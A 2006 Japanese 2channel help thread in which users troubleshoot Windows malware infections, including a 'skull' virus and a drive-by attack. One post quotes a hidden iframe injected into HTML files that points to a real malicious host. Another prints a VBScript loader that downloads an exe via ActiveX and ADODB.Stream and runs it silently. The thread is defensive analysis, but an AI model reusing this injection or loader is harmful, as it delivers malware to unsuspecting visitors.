http://jp.winantivirus.com/download/2006/index.php?aid=swp_wa6p_ed1&lid=3249&affid=pp_3142381851&ex=1&ax=0
(このURL開くとスパムしつこいから注意)
に飛ばされるんだけどこれって社員かアフィリエイターの工作かね?今のとこウィルス、スパイウェアとして
検出されないしジョークソフトっぽいんだけど、、情報もってる人いない?

ちなみに出始めた原因は間違って.exe実行したってのは解ってる。
あとshutdown -a で中断しても今の所問題ない。
546名無しさん@お腹いっぱい。:2006/12/08(金) 18:34:02
オレも>>441の3つが摘出されたんだが、>>443のサイトにある解決策通りいかないので助けてほしい。

例えばBKDR_HUPIGON.GEN についていうと、
>>441ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=BKDR%5FHUPIGON%2EGEN&VSect=T
にある対処方法にあるレジストキーの最後mchInjDrvが存在しない。

他のBKDR_HUPIGON.AHP、BKDR_GRAYBIRD.GRも同様に最後のフォルダ場所が存在してないのだが、
この場合どうすればいいのだろうか?
(HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\までは到達する)


どなたかアドバイス求む。
547名無しさん@お腹いっぱい。:2006/12/08(金) 18:37:41
>>545
何を実行したか書けよ。
548名無しさん@お腹いっぱい。:2006/12/08(金) 18:57:01
>>540
似たようなのにやられたよー。
いろいろあってC:\WINDOWS\Prefetchフォルダを監視してたら
IEのコンテキストメニューを使うたびにDr.WEB CureIt!で削除したはずの
ウィルスが復活するからから気づいた。

感染している.htm及び.htmlにアクセスするとTrojan.DownLoader.15621を
勝手にダウンロードして実行してる。

.htm及び.htmlのソースに追加されたiframeタグはコレ(http抜いた。踏むなよ?)
<iframe src="://97754866.ee28.cn/htm/" width="0" height="0" scrolling="no" frameborder="0"></iframe>

HDDの全部の.htmlと.htmに感染しているみたいだから
こっちも一大捜索中だー。マジ勘弁。
549名無しさん@お腹いっぱい。:2006/12/08(金) 18:59:46
>>546
BKDR_HUPIGON.GEN は、総称なんで、後回し。

BKDR_HUPIGON.AHP が作成したファイルは BKDR_GRAYBIRD.GR として検出される。
BKDR_GRAYBIRD.GR が作成したファイルは BKDR_HUPIGON.AHP として検出される。

と書いてある。要は、

G_Server.DLL
G_Server.exe
Audio.exe
Audio_hook.dll

が Windows フォルダに無いかチェックする。そして、BKDR_HUPIGON.AHP / BKDR_GRAYBIRD.GR の対策方でレジストリを削除する。
思うに、これらのファイルが存在するが、実行はされてないと思うんだが……。
550名無しさん@お腹いっぱい。:2006/12/08(金) 19:27:31
>>547
プログラムです。恐らく個人ユーザーが作成したもの(.exe)
ていうか製品だったら鼻っから販売元問い合わせると思うのだが。。

うpろうとおもったんだけどファイル自体消しちゃって無いぽ。。
551名無しさん@お腹いっぱい。:2006/12/08(金) 19:31:38
>>550
どこでそのexeは手に入れたの?
552名無しさん@お腹いっぱい。:2006/12/08(金) 19:36:47
>>551
Winnyです。
553名無しさん@お腹いっぱい。:2006/12/08(金) 19:47:53
>>552
(;^ω^)
554名無しさん@お腹いっぱい。:2006/12/08(金) 19:53:36
>>552
一応訊いてみるけど、合法スレの住人?
違うならスルーで構わない

つか >>545 でヤバい URL だと分かってるなら、ttp から書いたほうがいいとおもうんだ('A`)
555名無しさん@お腹いっぱい。:2006/12/08(金) 20:04:12
>>554
いやどこの住人でもない、2ch自体はそれ程見ません。
ただ"mod_v15m"ってウィルス自体情報が無いみたいでここなら一度は上がってるかと
思って、ちょっと気になったので。まぁ前例が無いみたいなので
情報求めてる人間からすればこれで終わりかな。

URLは書いてから気づいたよ。スマソ
556名無しさん@お腹いっぱい。:2006/12/08(金) 20:08:25
>>555
リカバリ。
P2Pソフト使うなら自己責任。
ウイルスに感染しても勿論自己責任。
アンチウイルスは入れてる?
557名無しさん@お腹いっぱい。:2006/12/08(金) 20:17:38
>>556
助言サンクス。でも対処法でリカバリはもう視野にいれてる。
ただこれがジョークソフトなのか本物なのかの情報が必要だった。
とりあえず一応スキャンしたのは
Ad-aware、Spybot、ノートン、ウィルスバスター(オンライン)、トレンドマイクロスキャン(オンライン)
んで何れも何もひっかからない。

要は気になるならリカバリ、高をくくるならそのまま。

http://d.hatena.ne.jp/maple_magician/20061011/1160574881
にある様に"ウィルス対策メーカー各社の命名規則に合致しない"
とあるのでちょっと悩んでたってとこです。
558名無しさん@お腹いっぱい。:2006/12/08(金) 20:29:52
セキュリティベンダーにファイル送って解析してもらえ
そして巣に帰れ
559名無しさん@お腹いっぱい。:2006/12/09(土) 02:28:48

みなさん バーチャルマシンを使いましょう
あと、イメージバックアップもね
560名無しさん@お腹いっぱい。:2006/12/09(土) 03:08:21
バーチャンのマシンは今使っています
561名無しさん@お腹いっぱい。:2006/12/09(土) 04:43:39
新種のドクロウイルスにかかりました
詳細はhttp://pc7.2ch.net/test/read.cgi/pc/1062738190/
uidate.exeが怪しいっぽいけど操作できない;;
562名無しさん@お腹いっぱい。:2006/12/09(土) 15:19:11
家族のパソコンです。普段自分は全く触っていないので曖昧な点があります。申し訳ありません。
【使用OS】 WindowsXP Home Edition
【WINDOWS UPDATE】 かなり長い間(半年〜数年レベル)でやっていないと思います。
【ウィルスソフト】 Norton2004
【UPDATE】 完全に期限切れです。
【スキャン】 すぐに再起動されるのでスキャンできない状態です。
【症状】 パソコンのシャットダウンができず、再起動される。
操作中突然再起動される。インターネット接続中は大量のメール送信が行われ、
そのためのノートンのスキャンの重さでパソコンが固まる。
【やったこと】 Blasterではなかったので、Sasserかなと思いましたが、
終了カウントダウンのダイアログの表示はありません。
また、HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
のレジストリの値を見ても、"avserve.exe"などが見つかりませんでした。
現在セーフモードで起動中です。
【とった処置】 ファイアーウォールの設定をonにしました。

アップデートが完全に放置されていたりと酷いマシンですが、
どなたかご教授頂けたら嬉しいです。よろしくお願いします。
563562:2006/12/09(土) 15:21:53
とりあえず、メールの大量送信を止める方法だけでも
教えていただけたら助かります。本当によろしくお願いします。
564名無しさん@お腹いっぱい。:2006/12/09(土) 15:22:54
オンラインスキャン
565名無しさん@お腹いっぱい。:2006/12/09(土) 15:27:02
566562:2006/12/09(土) 15:28:22
回答ありがとうございます。
でも、インターネットに接続すると、メールの大量送信が始まってしまうために、
パソコンが固まってしまうんです…。
無知で対策が浮かばないので、すみません…。
567562:2006/12/09(土) 15:29:59
>565
ありがとうございます。
ウィルスが確定してないのに、駆除ファイルをあてても大丈夫なんですか?
568名無しさん@お腹いっぱい。:2006/12/09(土) 15:33:02
>>566
SafeModeで起動して手動で削除か
タスクマネージャで止めてみても
再送信するの?
止まるならその時点でスキャン
569名無しさん@お腹いっぱい。:2006/12/09(土) 15:34:04
>>567
あっても違うなら薬にも毒にもならない
570562:2006/12/09(土) 15:34:27
すみません、何を削除あるいは止めればいいのでしょうか?
571名無しさん@お腹いっぱい。:2006/12/09(土) 15:38:46
>>570
メール送信で止まるんならMailerを止める
ノートンなら最新ファイルをDLして手動であてて
スキャンする
削除はあきらかにおかしいもの、わからないなら
確定してからのこと
572562:2006/12/09(土) 15:43:45
何度もすみません。
メールソフトは起動されていない状態なのですが、
何かを止めればメール送信が止まるということですか?
ノートンは、上記の通り、期限切れのため最新ファイルのDLができません…。
573名無しさん@お腹いっぱい。:2006/12/09(土) 15:51:06
>>572
大量送信は何がしている?不明なら
25番ポートブロック
メールサーバを経由せず、直接迷惑メールを送信する際のメール送信経路
(アウトバウンド25番ポート)をブロック
送信ドメイン削除等を試すといい

定義ファイル つttp://www.symantec.com/region/jp/avcenter/defs.download.html
574名無しさん@お腹いっぱい。:2006/12/09(土) 17:54:26
>>562
ルータ&アンチウイルスソフトを買ってくる

リカバリ

アンチウイルスのインストール

WinUpdate
575540:2006/12/09(土) 18:29:18
>548
うちのはURLの数字が 81931053 だった。あとはタグの記述同じ。
これどっかに報告した方がいいのかな。

ファイルの修正は、ベクターで落としたTextSSっていうフリーソフトを使ったよ。
htmlファイルを全部リストアップして置換できる。便利だった。
576名無しさん@お腹いっぱい。:2006/12/09(土) 18:41:18
577名無しさん@お腹いっぱい。:2006/12/09(土) 18:48:11
>>575
感染元はどこ?
578名無しさん@お腹いっぱい。:2006/12/09(土) 20:10:33
>>548
これ解析したんだけど、2つ飛んだ先に細工されたVBScriptがある。
でActiveX使ってウイルス実行させてるんだけど、同じコードで実行ファイル変えて試したんだけど、動かなかった。

ウイルス自体は、大抵のアンチウイルスソフトで検出できるけど、実行されてしまうなら、リアルタイム検索が動いてないか、
もしくは、IEのセキュリティホールになるな。
コードはこんな感じ。もちろん、細工されて英数字になってるが。

<スクリプト language="VBScript">
on error resume next

Set xxxxxxxx = document.createElement("object")
xxxxxxxx.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"

Set xxxxxx = xxxxxxxx.CreateObject("Microsoft.XMLHTTP","")
set xxxx = xxxxxxxx.createobject("Adodb.Stream","")
xxxx.type = 1

xxxxxx.Open "get", "http://hoge/hoge.exe", False    ←ウイルス
xxxxxx.Send
xxxxxxx = "mdb.exe"

set xxxxx = xxxxxxxx.createobject("Scripting.FileSystemObject","")
set tmp = xxxxx.GetSpecialFolder(2)              ←テンポラリフォルダ
xxxxxxx = xxxxx.BuildPath(tmp,xxxxxxx)
xxxx.open
xxxx.write xxxxxx.responseBody
xxxx.savetofile xxxxxxx,2
xxxx.close
set qqq = xxxxxxxx.createobject("Shell.Application","")
qqq.ShellExecute xxxxxxx,"","","open",0
</スクリプト>
579名無しさん@お腹いっぱい。:2006/12/09(土) 20:19:30
>>562
つづきはノートンスレで
【ノートン】インターネットセキュリティ Ver.101【2007】
http://pc8.2ch.net/test/read.cgi/sec/1165118304/
580名無しさん@お腹いっぱい。:2006/12/09(土) 21:07:53
【使用OS】 WindowsXP Pro SP2
【WINDOWS UPDATE】 最新のはず
【ウィルスソフト】 Norton2007
【UPDATE】 最新
【スキャン】 検出しないorz
【症状】 自分で認識できる範囲では、OS起動後スクリーン真ん中にドクロマークが出て不具合が出るなど
ドクロマークはalt+f4で脱出可能、その後アプリ、コントロールパネル、レジストリがいじれない
流出系なのか破壊系なのかどういうことをするのか詳しい情報は調べても皆無。
【やったこと】 セーフモードで立ち上げてみてそれらしいファイル、自動起動を見てもなかった。
ググってみても今年10月前後辺りからの情報しかない、しかも感染したHP、Blogの管理人や
2chの住人全員がクリーンインストール、もしくは放置している、自力でウイルスだけ退治した人はまだ誰もいませんorz
情報ではノートン、アンチウイルス、マカフィーの大御所もすべて敗北。どうやらシステムが書き換えられているらしい?という話です。
【とった処置】
お手上げなので、第三者に被害が行かないように感染したPCは電源切っています。
581名無しさん@お腹いっぱい。:2006/12/09(土) 21:20:59
>>580
■ウイルス感染の疑いがあるファイルをSymantec Security Responseに提出する方法
http://service1.symantec.com/SUPPORT/INTER/navjapanesekb.nsf/0a56418557b1ba9985256b03006ba774/533c441e2619a0b449256b5e0023af53
■スキャンと配信ウィザードを使用して Symantec Security Response に疑わしいファイルを提出する方法
http://service1.symantec.com/support/INTER/navjapanesekb.nsf/b0dbf49e05cc8def88256db3005f48d0/81045188a541010788256b0600061882
582名無しさん@お腹いっぱい。:2006/12/09(土) 21:26:21
>>580
それマジ・・?
583540:2006/12/09(土) 21:32:20
>577
すまん。感染元は分からない。
今自分が興味ある事のウェブリングやサーチから適当に飛んでは
チラ見してウィンドウを閉じたり、すぐ次に移動したりしてるんで。
多分、そこら辺だと思うんだけど。

今日も恐る恐るサイト巡りしてて、ウィルスアラートは無かったけど
気になって手動検索したら2個見つかったよ。
VBS_SMALL.DOO っての。
リアルタイム検索はオンになってるのに。
ウィルスバスターのサイトでウィルス情報見たけど、セキュリティホールは
関係ないみたいなこと書いてあった。信用していいのかな?

自分もサイト運営してるんで、トップページにウィルスに感染した事と
ウィルスチェックのお願いを書いておいた。

ちなみにサイト上にウィルスに書き換えられたファイルは無し。ウィルスも検出されず。
自分のサイトが感染源になってる事は無いと思うけど不安だ。
584名無しさん@お腹いっぱい。:2006/12/09(土) 21:54:49
要注意
ドクロウイルス(タイムボカン)−修復・リカバリ不能凶悪ウイルス
ウィルスに感染して(´・ω・`)ショボボーン
http://pc7.2ch.net/test/read.cgi/pc/1062738190/

実行ファイルは.jpg偽装
585名無しさん@お腹いっぱい。:2006/12/09(土) 22:08:32

NOD32 ヒューリスティックで反応
http://up2.viploader.net/pic/src/viploader367894.jpg

586名無しさん@お腹いっぱい。:2006/12/09(土) 22:09:27
>>584
俺もそれなった('A`)
そこでウイルス晒してるな、解析できる神の降臨を待つか・・
587名無しさん@お腹いっぱい。:2006/12/09(土) 22:14:46
>>586
ノーdスレにての情報
だれかが検体をSymantecに送ったようだ
摘出できたやつがいるらしい
588名無しさん@お腹いっぱい。:2006/12/09(土) 22:24:42
>>584
回復コンソールで立ち上げてc:\windows\system32\kernel32.dllを修復、
c:\windows\system32\uidate.exeを削除して、ログオフしてセーフモードで
再起動してシステムの復元を行って感染前の日付を復元。
589名無しさん@お腹いっぱい。:2006/12/09(土) 22:28:34
>>616
■スキャンと配信ウィザードを使用して Symantec Security Response に疑わしいファイルを提出する方法
http://service1.symantec.com/support/INTER/navjapanesekb.nsf/b0dbf49e05cc8def88256db3005f48d0/81045188a541010788256b0600061882

セキュリティ履歴>右上の「項目を検疫に追加」でファイル指定(「ディスクからファイルを削除」にチェック入れる)
>表示の選択ドロップダウンリストで「検疫」を選択
>検疫項目をポイントして、右下の「詳細」をクリック
>「シマンテック社に提出」をクリック
>ウイルスサンプル提出完了(提出完了後、履歴からは削除すればいい)
590名無しさん@お腹いっぱい。:2006/12/09(土) 22:35:21
>>588
システムの復元オフにしてた奴は
実質回復不能なのか?
591名無しさん@お腹いっぱい。:2006/12/09(土) 22:35:22
>>588
レジストリもぐちゃぐちゃになってるっぽいな
592名無しさん@お腹いっぱい。:2006/12/09(土) 22:44:30
>>590
hijackthisというソフト使ってuidate.exeの文字列を含むエントリーを削除だろうな。
593589:2006/12/09(土) 22:45:11
誤爆スマンテック
○| ̄|_
594名無しさん@お腹いっぱい。:2006/12/09(土) 22:52:46
blogでドクロマークの画像見つけたけど、いかにも・・だなwww
ttp://tatooari.blog71.fc2.com/index.php?q=%A5%A6%A5%A4%A5%EB%A5%B9
595名無しさん@お腹いっぱい。:2006/12/09(土) 23:02:40
>>594
すごいな
俺もここ一週間ばかりいろいろ情報調べてみたけど
なかなか該当のものが見つからなくて・・
ほとんどの情報が別物のドクロウイルス関係だったから
596 ◆N9P3SuvBPo :2006/12/09(土) 23:04:33
(話題の?)ドクロウイルスって奴、
感染して起動すると、デスクトップが表示される前にドクロが出現するというのは
わかったんだけどね。
起動して、どこまで正常に立ち上がって、どこでドクロが出現するのかが、
一応知りたいんだけどな。
597名無しさん@お腹いっぱい。:2006/12/09(土) 23:09:43
ログイン画面の時だよ、ログイン関係がおかしいのかな?と思って
LogonUIなどでログイン画面を変えたりいじってたら
再起動した時にドクロ画面が出なかった事がある、・・でも再起動はしたけどね
598名無しさん@お腹いっぱい。:2006/12/09(土) 23:13:08
今、感染中。

Alt+F4連打で一応脱出。無理やりIEは開けれるけど、ソフトの起動不可。

正常に終了や再起動ができないから、起動ボタン長押しでON/OFFしてる状態です。
599名無しさん@お腹いっぱい。:2006/12/09(土) 23:14:05
これの正体ってまだ誰もわかってないの?
他人に攻撃するための土台にされたらたまらんのですが
600597:2006/12/09(土) 23:16:33
文章変になったけど前半の再起動はリセットボタン
後半の再起動はウイルスによる強制再起動の事ね
アプリはほとんどダメだけど漏れの場合いくつか動くけどなぁ
601 ◆N9P3SuvBPo :2006/12/09(土) 23:17:49
>597
ログイン画面の時というと、winlogon.exeかuserinit.exeが読み込まれるとこ?
602名無しさん@お腹いっぱい。:2006/12/09(土) 23:19:46
>>601
多分そのへんのタイミング
603名無しさん@お腹いっぱい。:2006/12/09(土) 23:20:54
インスコマンコが感染実験しようとしたがランタイムエラー
http://pc8.2ch.net/test/read.cgi/sec/1140517079/

どうにかならんの?
感染ファイルのはずなんだが
604 ◆N9P3SuvBPo :2006/12/09(土) 23:21:41
>602
つまり、「ようこそ」っていう画面のところだな。
なんとかして、レジストリエディタ開くこと出来ない?
605名無しさん@お腹いっぱい。:2006/12/09(土) 23:22:34
ようこその前かな
606名無しさん@お腹いっぱい。:2006/12/09(土) 23:24:38
微妙な所だ、こっちはようこそ画面が一瞬も写らないうちに
ドクロマークが出るな
607名無しさん@お腹いっぱい。:2006/12/09(土) 23:26:09
BIOSもやられているのなら、どうしようもないが
HD外付けで何とかできないか?
608 ◆N9P3SuvBPo :2006/12/09(土) 23:27:12
「ようこそ」の前に読みこまれるプロセスってなんだろうな…
たくさんあるし、見分けるのも偉く大変だし。

PC起動→Windows XPのロゴが出る→「ようこそ」が出る前にドクロ
609名無しさん@お腹いっぱい。:2006/12/09(土) 23:29:10
ようこそ画面がドクロになってるだけだったりしてw
610名無しさん@お腹いっぱい。:2006/12/09(土) 23:29:45
>>608
お詳しいようですね。
リカバリができない俺にとっては大きな存在だよ(´・ω・`)
611名無しさん@お腹いっぱい。:2006/12/09(土) 23:31:15
>>604
レジストリもソフトの起動もできない('A`)
612 ◆N9P3SuvBPo :2006/12/09(土) 23:32:13
>610
リカバリできない?
リカバリディスク持ってないの?
613 ◆N9P3SuvBPo :2006/12/09(土) 23:34:02
>611
んー、ソフトを起動するときになんかのエラーメッセージが出てきて、起動できないとか?
614名無しさん@お腹いっぱい。:2006/12/09(土) 23:35:12
xpの裏技でなんかあったような

ようこそ前にプロンプトだす方法
でもメーカー限定だったような
615名無しさん@お腹いっぱい。:2006/12/09(土) 23:35:26
>>612
ディスクはあるけど、無知なだけだよ。
616 ◆N9P3SuvBPo :2006/12/09(土) 23:38:05
>615
リカバリディスクがあるんならできるんじゃないか?
取扱説明書の「リカバリ(PCを購入状態を戻す)」か、「再セットアップ」っていうページを
良く読んでやってみ。
617名無しさん@お腹いっぱい。:2006/12/09(土) 23:42:05
>>616
感染してから2日目。丸一日説明書やサイトと格闘したけど
いまいちピンとこなかったんだよ(´・ω・`)

また明日頑張ります。ありがとう。
618 ◆N9P3SuvBPo :2006/12/09(土) 23:44:54
>617
リカバリに自信が無ければ、購入したお店に持っていって、
店員さんにリカバリ頼んでみるのも有りだと思うぜ。
無論、お金は取られるから、見積もりは取ってもらったほうがいいよ。
619名無しさん@お腹いっぱい。:2006/12/09(土) 23:53:24
ってか今時ドクロとかww作った奴センス最悪だなwwww
620名無しさん@お腹いっぱい。:2006/12/10(日) 00:04:37
KNOPPIXから起動して復帰とかは?
作ってないか…
621名無しさん@お腹いっぱい。:2006/12/10(日) 00:08:10
直った香具師の報告マダ━━━━━━(゚∀゚)━━━━━━??
622名無しさん@お腹いっぱい。:2006/12/10(日) 00:23:07
http://www.higaitaisaku.com
で質問すれば何かわかるかも
623 ◆N9P3SuvBPo :2006/12/10(日) 00:23:52
このドクロウイルス、ソフトの実行を妨げるというのだが、
regedit.exe(レジストリエディタ)とかregedt32.exe(レジストリエディタ)とか
sfc.exe(システムファイルチェッカー)などの、.EXEファイルが開けなくなるんかな?

command.com(コマンドプロンプト)は?
スタート→ファイル名を指定して実行→command→OK
624名無しさん@お腹いっぱい。:2006/12/10(日) 00:24:19
てか、新種のドクロウィルスに関して
勝手にタスクマネージャが開かれるようになったんだが・・・。
625名無しさん@お腹いっぱい。:2006/12/10(日) 00:28:45
'OK'は内部コマンドまたは外部コマンド、操作可能なプログラムまたは
バッチファイルとして認識されていません
626名無しさん@お腹いっぱい。:2006/12/10(日) 00:29:44
627 ◆N9P3SuvBPo :2006/12/10(日) 00:35:29
>625
もしかして、ソフトを起動したときに出るエラーメッセージ?
628名無しさん@お腹いっぱい。:2006/12/10(日) 00:39:41
>>627
いいえ。
ソフトを起動させようとダブルクリックしても、無反応なんです。
629 ◆N9P3SuvBPo :2006/12/10(日) 00:42:01
>628
マジっすかあ!?
EXEファイルもcommand.comを起動不可能とは…
630名無しさん@お腹いっぱい。:2006/12/10(日) 00:46:28
俺今PC内「uidateで検索したら
Temporary Internet Filesのなかに「UIDate.html」見つけた・・
だいじょうぶか?
631名無しさん@お腹いっぱい。:2006/12/10(日) 00:47:13
command.comでuidateってやったら
ドクロマーク出てビビった・・・。
632名無しさん@お腹いっぱい。:2006/12/10(日) 00:47:59
>>628-629
ウィルスに感染して(´・ω・`)ショボボーン
http://pc7.2ch.net/test/read.cgi/pc/1062738190/

687 名無しさん sage New! 2006/12/09(土) 23:28:11 0
俺、ドクロマークは出るし、再起動、終了もできねーけど
ウイルス対策ソフト、アプリ、レジストリ起動できるぞ?
俺の場合ウイルス踏んでハッと気がついてすぐにタスクマネージャー
から怪しい実行ファイル終了させたからかな?それでも感染はしてるけど・・・


ラッキーな奴もいるもんだな
633名無しさん@お腹いっぱい。:2006/12/10(日) 00:51:05
>>632
俺の場合、漫画DLしてクリックしたらexeファイルで
ハッとしたが、何もならなかったから展開して漫画読んでた。

次の日、感染した。
634 ◆N9P3SuvBPo :2006/12/10(日) 00:51:25
>631
command.comの起動はできるのか。
でも、cmd.exeの起動は不可能と。
635名無しさん@お腹いっぱい。:2006/12/10(日) 00:53:49
漫画って何の漫画?
636名無しさん@お腹いっぱい。:2006/12/10(日) 00:54:46
>>634
勘違いさせてごめん。
>>623の方法で「OK」じゃなくて「uidate」ってやっただけだよ。
637名無しさん@お腹いっぱい。:2006/12/10(日) 00:56:39
>>635
ブリーチの24巻だよ
638名無しさん@お腹いっぱい。:2006/12/10(日) 00:58:04
俺はワンピースのたしか43か44巻だったなorz
639 ◆N9P3SuvBPo :2006/12/10(日) 00:58:10
>636
ファイル名を指定して実行から「uidate」と入力してOKってこと?

commandと入力してOK押しても無反応か?
640名無しさん@お腹いっぱい。:2006/12/10(日) 01:00:42
スタート→ファイル名を指定して実行→command→OK
→'OK'は内部コマンドまたは外部コマンド、操作可能なプログラムまたは
バッチファイルとして認識されていません

スタート→ファイル名を指定して実行→command→uidate
ドクロマークが画面に出てビビった
641名無しさん@お腹いっぱい。:2006/12/10(日) 01:04:54
スタート→ファイル名を指定して実行→regeditはどうよ
642名無しさん@お腹いっぱい。:2006/12/10(日) 01:06:38
>>641
たくさん不正命令を検出したよorz
643 ◆N9P3SuvBPo :2006/12/10(日) 01:09:08
>640
>→'OK'は内部コマンドまたは(ry
OKというのは、OKと入力するんじゃなくて、OKをクリックね。
またはEnterキーを押すってこと。

>スタート→ファイル名を指定して実行→command→uidate
でドクロが出るんですね。
uidateと入力した時点でドクロが出るのか、もしくはuidateと入力して
EnterもしくはOKを押すとドクロが出るのかどっち?
644名無しさん@お腹いっぱい。:2006/12/10(日) 01:12:23
>>643
OKを押す所が無く、Enterを押しても改行されるだけでした。

ドクロについてはuidateと打ち込んでenterでドクロが出てきました。
645 ◆N9P3SuvBPo :2006/12/10(日) 01:17:18
>644
>改行されるだけ
普通だと、Enter押すとプログラムが起動するはずなのに?

じゃあ、ファイルの検索というのは起動できる?
スタート→検索
646名無しさん@お腹いっぱい。:2006/12/10(日) 01:20:06
>>645
起動できますー
647 ◆N9P3SuvBPo :2006/12/10(日) 01:22:18
>646
では、PC内を「command.com」で検索してみて。
オプションで、探す場所はc:\
サブフォルダの検索にチェック
648名無しさん@お腹いっぱい。:2006/12/10(日) 01:29:27
>>575
ソフトの紹介ありがとう。Devasってのを使ったけどそっちも落として使ってみる。

あとそうそう、こっちは拡張子.htm .asp .phpとhtm・asp・phpがファイル名に含まれるファイルに
iframeタグが追加されてたよ。

.htmと.htmlの検索だけじゃ不十分かもしれないから気をつけれ〜。

>>578
解析サンクスです。アクセスすると
C:\windows\system32\update\update.exe
C:\Documents and Settings\ユーザー名\Local Settings\Temp\mdb.exe
この2つが生成されてmdb.exeの方が実行されてました。
同時に起動したmdb.exeが即座にネットにアクセスしてたので…その後いろいろ悪さをするんだろうなぁ。
とりあえず嫌気が差したんで必要がないときはActiveXを止めておきます。

感染源は感染しているwebサイトかも?
iframeが追加されたhtmlファイル自体は検知してくれないんで知らずに踏んでる人が他にもいるかも…。
649名無しさん@お腹いっぱい。:2006/12/10(日) 01:33:38
>>647
出てきませんでした^^;
普通は出てくるものなんですか?
650 ◆N9P3SuvBPo :2006/12/10(日) 01:37:28
>649
たぶん普通は出てくるだろうけど、フォルダオプションで全てのファイルを
表示するように設定されていないのでは?

全てのファイル・フォルダを表示する方法
ttp://www.higaitaisaku.com/zenhyoji.html
651名無しさん@お腹いっぱい。:2006/12/10(日) 01:38:49
systemファイル削除系か?

652sage:2006/12/10(日) 01:42:08
ウィルスに感染して(´・ω・`)ショボボーン
ttp://pc7.2ch.net/test/read.cgi/pc/1062738190/

662 :655:2006/12/09(土) 21:40:14 0
これがウイルス本体:悪用厳禁 DLkey=dokuro

を、scan。

常駐avast!検知せず。
非常駐 BitDefender 8 Free Editionが、反応。

File:
D:\Download\2chshare-mini_0081.zip=>000.jpg.exe
Suspected with:
BehavesLike:Win32.SMTP-Mailer

このスレ読んでなかったら、危いところだった。
653名無しさん@お腹いっぱい。:2006/12/10(日) 01:49:17
>>650
フォルダオプションで全てのファイルを表示するように設定していました。

検索方法は「ファイルとフォルダすべて」→探す場所ドライブC、サブフォルダにチェック
を入れる方法であってますよね?

出てきませんでした(´・ω・`)
654 ◆N9P3SuvBPo :2006/12/10(日) 01:51:02
>653
そっか…
それじゃ、regedit.exeは検索して見つかる?
655名無しさん@お腹いっぱい。:2006/12/10(日) 01:57:13
>>654
regedit.exeの方もHITしませんでした・・・^^;
656 ◆N9P3SuvBPo :2006/12/10(日) 02:03:08
>655
やはり>651の言うようにシステムファイル削除系のウイルスか。

explorer.exeなどの全部のEXE形式のファイルがあぼーんされてるんじゃ…
657名無しさん@お腹いっぱい。:2006/12/10(日) 02:07:51
各社、対処用ウイルス駆除ツール発表されたとして
一体どうやって実行させる気だろう・・・
658名無しさん@お腹いっぱい。:2006/12/10(日) 02:10:50
windowsインストールDiskで回復コンソールからはいったらどう?
659名無しさん@お腹いっぱい。:2006/12/10(日) 02:11:42
>>648
ちょっと調べてみたら、WindowsUpdateで2004年12月に対策されてる。 ttp://support.microsoft.com/kb/870669/ja
問題は、Adodb.StreamでローカルマシンのHDDにデータを書き込めるってところ。
で、IEではAdodb.Streamを起動できない。

なので、セキュリティソフト全OFFにして直踏みしてみた。結果、何も実行されなかった。
普通の人は踏んでも、多分問題無いと思う。
不明なのは、IEコンポーネントのブラウザ。IEでは起動しないが他は分からん。

>感染源は感染しているwebサイトかも?
>iframeが追加されたhtmlファイル自体は検知してくれないんで知らずに踏んでる人が他にもいるかも…。

感染源は、iframe srcの2つ先。だから、自分の周りでスキャンしても無意味。
660 ◆N9P3SuvBPo :2006/12/10(日) 02:13:06
>658
回復コンソールからEXEファイルの実行は不可能だと聞いているが
661名無しさん@お腹いっぱい。:2006/12/10(日) 02:28:04
>>660
実行する必要もないと思うけど。
クロとされるファイル
c:\windows\system32\uidate.exeをdeleteするとか、
listsvc→disableするとかできないの?
662 ◆N9P3SuvBPo :2006/12/10(日) 02:32:21
>661
delコマンドで削除するよりも、renコマンドでリネームのほうが良いんじゃない?
663名無しさん@お腹いっぱい。:2006/12/10(日) 02:38:55
>>659
thx!早速、レジストリエディタを開いて
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility
を見たら教えていただいたページのキーが既に作成されていましたΣ(゚Д゚;
使用しているブラウザはIEコンポのundonutです…。IEコンポマズ

>感染源は、iframe srcの2つ先。だから、自分の周りでスキャンしても無意味。
スキャン無意味ですか…orz とにかくひたすら防御に専念します。
664名無しさん@お腹いっぱい。:2006/12/10(日) 02:39:56
>>662
それの方がいいかもね。
いずれにしろ、立ち上がってるwindowsから
入るよりCD−ROMから回復コンソールに入ったほうが
安全だと思う。
665名無しさん@お腹いっぱい。:2006/12/10(日) 02:46:05
666 ◆N9P3SuvBPo :2006/12/10(日) 02:46:44
ようこそ画面が出る前、もしくはようこそ画面そのものがドクロなら
回復コンソールが起動可能な筈だからな。
667名無しさん@お腹いっぱい。:2006/12/10(日) 07:59:32
>>652の正体はC:\WINDOWS\network.exe
New Malware.j
こいつらしい
668名無しさん@お腹いっぱい。:2006/12/10(日) 09:47:39
HijackThisは起動しないの?
リカバリーのウィザードも?

拡張子をCOMに変えでもって駄目?

アダ被にお世話になるのが一番だと思うが…
669名無しさん@お腹いっぱい。:2006/12/10(日) 10:00:57
潜伏期間があるらしいから、発病前ならばなんとかできる「かも」しれないかな〜くらいじゃね?

とりあえず現在まだPCがまともに動いている人は該当ファイルをOCない検索かけて調べてみるくらいだろう。
どのような条件で発病するのかはまだ不明だが、見つかった場合はPCそのままOFFにしないで稼働させておいたほうが無難かもな。
まあ、一応はいくつかのアンチウイルスソフトで発病前に駆除できたという報告もあるようだし・・・
670インスコマン ◆qlwUrCXXtM :2006/12/10(日) 10:13:22
リカバリーして元に戻るならいいけど、それすらもわからんから怖いな・・・
671名無しさん@お腹いっぱい。:2006/12/10(日) 10:26:50
発病後の被害状況がどこまであるのかがまだ不明だからね
BIOSや他のハードにまで及んでいたらもう手の施しようがないだろうな
672名無しさん@お腹いっぱい。:2006/12/10(日) 10:47:45
673名無しさん@お腹いっぱい。:2006/12/10(日) 10:51:58
674673:2006/12/10(日) 10:53:19
675名無しさん@お腹いっぱい。:2006/12/10(日) 10:53:30
リカバリで直らんの???
かなりたちが悪くないか?
676名無しさん@お腹いっぱい。:2006/12/10(日) 10:56:20
677名無しさん@お腹いっぱい。:2006/12/10(日) 11:21:12
>>676
お前頭悪いだろ
678名無しさん@お腹いっぱい。:2006/12/10(日) 11:55:32
>>676の情報はデマですので注意。
679名無しさん@お腹いっぱい。:2006/12/10(日) 11:57:41
このドクロ専用スレ立ってもいいくれーだな
あまりにも凶悪すぎるわこりゃ
